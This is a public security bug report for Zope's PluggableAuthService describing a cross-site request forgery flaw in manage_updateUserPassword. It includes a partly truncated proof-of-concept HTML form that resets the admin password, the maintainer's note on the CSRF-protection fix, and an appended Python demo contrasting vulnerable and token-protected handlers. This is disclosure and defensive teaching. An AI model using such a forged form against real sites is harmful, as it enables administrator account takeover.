userManager manage_updateUserPassword csrf
Bug #1079204 reported by Thomas
This bug affects 1 person
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Zope PAS | Fix Released | Undecided | Tres Seaver | |
Bug Description
The following HTML allows the admin password to be reset:
<html>
<body>
<form action="https:/
user_id : <input value="admin" name="user_id">
<br>
password: <input value="zenoss26" name="password">
<br>
confirm :<input value="zenoss26" name="confirm">
<br>
<input type="submit">
</form>
<script>
document.
</script>
</body>
</html>
Changed in zope-pas:
- assignee: nobody → Tres Seaver (tseaver)
- status: New → Confirmed

Changed in zope-pas:
- status: Fix Committed → Fix Released
- information type: Private Security → Public Security
I have checked in CSRF protection for the ZODBUserManager,
ZODBRoleManager, ZODBGroupManager, and DynamicGroupsPlugin
plugins:
http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128301&view=rev
http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128302&view=rev
http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128303&view=rev
http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128304&view=rev
http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128305&view=rev
I have verified that your exploit is now blocked.
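The following is an added example illustrating both the report's cross-site form and the kind of protection the fix comment describes. It is not part of this bug page and not the code committed to Products.PluggableAuthService; the `Request`, `UserStore` class and the `csrf_token` field name are hypothetical stand-ins. It models a password-update handler shaped like `manage_updateUserPassword`, once trusting any request that arrives with the admin's session cookie (the browser attaches that cookie to a form posted from any origin), and once requiring a per-session synchronizer token that only a page served to the admin's own session can contain.

```python
import hmac
import secrets
from dataclasses import dataclass


@dataclass
class Request:
    """Minimal stand-in for a Zope request (hypothetical, not PAS's object).

    form:    the submitted POST fields
    session: server-side state for the session cookie the browser sent. A
             cross-site form post carries the victim's cookie and therefore
             the victim's session, which is exactly what CSRF abuses.
    """
    form: dict
    session: dict


class UserStore:
    """Toy replacement for the user manager's password storage."""

    def __init__(self):
        self.passwords = {}
        self.rejected = []  # rejected submissions, kept for detection/audit


def update_password_unprotected(store, request):
    """Handler as the report describes it: any request with a valid session
    is honoured, regardless of which origin built the form."""
    user_id = request.form["user_id"]
    if request.form["password"] != request.form["confirm"]:
        return "mismatch"
    store.passwords[user_id] = request.form["password"]
    return "updated"


def get_csrf_token(session):
    """Return the session's synchronizer token, minting one on first use.
    The token is only embedded in pages served to this session, so a page
    on another origin cannot read it (same-origin policy)."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_hex(32)
        session["csrf_token"] = token
    return token


def check_csrf_token(request):
    """True only if the form carries the token bound to this session."""
    expected = request.session.get("csrf_token")
    supplied = request.form.get("csrf_token")
    if not expected or not supplied:
        return False
    # constant-time comparison so the token cannot be leaked by timing
    return hmac.compare_digest(expected, supplied)


def update_password_protected(store, request):
    """Hardened handler: refuse the state change without a matching token."""
    if not check_csrf_token(request):
        store.rejected.append(dict(request.form))
        return "forbidden"
    return update_password_unprotected(store, request)


def render_password_form(session):
    """Server-rendered form for a logged-in session, carrying the hidden token."""
    token = get_csrf_token(session)
    return (
        '<form method="post" action="manage_updateUserPassword">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="user_id"><input name="password" type="password">'
        '<input name="confirm" type="password"><input type="submit"></form>'
    )


def demo():
    store = UserStore()
    store.passwords["admin"] = "original-secret"
    admin_session = {}  # the admin is logged in; every request carries this session
    render_password_form(admin_session)  # admin has viewed the form, token now exists

    # Constructed cross-site submission with the same fields as the report's form;
    # it rides on the admin's cookie but cannot include the admin's token.
    forged = Request(
        form={"user_id": "admin", "password": "zenoss26", "confirm": "zenoss26"},
        session=admin_session,
    )
    results = {}
    results["unprotected"] = update_password_unprotected(store, forged)
    results["password_after_unprotected"] = store.passwords["admin"]

    store.passwords["admin"] = "original-secret"
    results["protected_forged"] = update_password_protected(store, forged)
    results["password_after_forged"] = store.passwords["admin"]

    # Legitimate change: the admin submits the form the server rendered for them.
    legit = Request(
        form={"user_id": "admin", "password": "new-secret", "confirm": "new-secret",
              "csrf_token": admin_session["csrf_token"]},
        session=admin_session,
    )
    results["protected_legit"] = update_password_protected(store, legit)
    results["password_after_legit"] = store.passwords["admin"]
    results["rejected_count"] = len(store.rejected)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the unprotected handler accepting the forged submission and overwriting the admin password, while the protected handler rejects it and records the attempt, yet still accepts the admin's own submission that carries the session's token. The rejected-submission log is the signal a defender would alert on after a fix like this ships.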